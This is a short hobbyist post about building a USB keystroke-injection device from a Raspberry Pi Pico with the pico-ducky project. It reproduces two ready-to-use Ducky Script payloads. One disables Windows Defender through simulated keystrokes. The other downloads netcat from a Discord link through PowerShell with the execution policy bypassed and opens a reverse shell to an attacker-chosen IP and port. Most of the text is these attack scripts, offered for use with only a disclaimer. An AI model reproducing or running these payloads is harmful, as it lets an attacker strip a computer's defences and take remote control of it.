Raspberry Pi Pico

 Ok starting out I bought this at Amazon it was 12.99 and some shipping. 

When you get this cool little device head on over to Github to the man who put this package to gather {dbisu/pico-ducky}.

Big thumbs up.


Find Scripts here.


Disable Windows Defender

REM turn off windows defender then clear action center

REM author:judge2020

REM You take responsibility for any laws you break with this, I simply point out the security flaw

REM

REM start of script

REM

REM let the HID enumerate

DELAY 2000

ESCAPE

DELAY 100

CONTROL ESCAPE

DELAY 100

STRING Windows Defender Settings

ENTER

DELAY 2000

REM why TAB and HOME?

TAB

DELAY 50

REM why TAB and HOME?HOME

DELAY 50

ALT F4

DELAY 3200

REM windows + a = ????

GUI a 

DELAY 500

ENTER

DELAY 100

GUI a




Netcat ReverseShell


REM Change The IP and the Port, and for the netcat download link you can use it but it sure will expired so change it (the link you need to change is the discord link if it-



REM expired if the link is still available you still can use that


REM Subscribe to my YouTube channel https://www.youtube.com/channel/UCL5HhLmJ7gSkf9zQu39LRoQ (dont really post anything related to this tho xD)


REM for the ip address and the port pls do remove this symbol (<>)

DELAY 1000

GUI r

DELAY 1000

STRING cmd

ENTER

DELAY 1000

STRING cd / & mkdir win & cd win & echo (wget 'https://cdn.discordapp.com/attachments/823520101415911464/826813046500491264/nc64.exe' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1

ENTER

DELAY 3000

STRING START /MIN a.exe <IP ADDRESS> <PORT> -e cmd.exe -d & exit

ENTER